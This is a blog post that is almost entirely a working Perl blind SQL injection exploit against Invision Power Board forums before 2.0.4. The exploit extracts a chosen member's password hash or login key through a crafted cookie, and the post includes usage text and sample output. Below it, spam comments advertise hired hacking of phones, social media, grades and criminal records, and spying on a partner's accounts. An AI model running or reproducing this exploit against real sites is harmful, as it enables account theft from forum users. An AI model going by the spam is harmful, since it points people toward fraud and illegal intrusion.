Virus Code In perl For SQL Injection


Virus Code In perl For SQL Injection


#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (&lt2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV &lt 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) &gt 0){
 print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit(); 
 }
else
 { 
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)&lt5) { $i=crack($fmin,$fmax); return $i; }

 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }

sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i&lt$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }

sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
 $socket = IO::Socket::INET-&gtnew( Proto =&gt "tcp", PeerAddr =&gt "$server", PeerPort =&gt "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

 while(&lt$socket&gt)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }

sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v &lt 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]

 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute

 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)

 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }

3 comments:

Lava Kafle said...

perfect

jane holly said...

This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:

-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change

Email: onlineghosthacker247@ gmail .com

Amalia Eva said...

I Want to use this medium in appreciating hacking setting, after being ripped off my money,he helped me find my cheating lover whom i trusted alot and he helped me hack his WHATSAPP, GMAIL and kik and all other platforms and i got to know that he has being cheating on me, in less than 24 hours he helped me out with everything, hacking setting is trust worthy and affordable contact him on: hackingsetting50 at gmail dot com

Post a Comment

STEALTH HACKER

Sponsers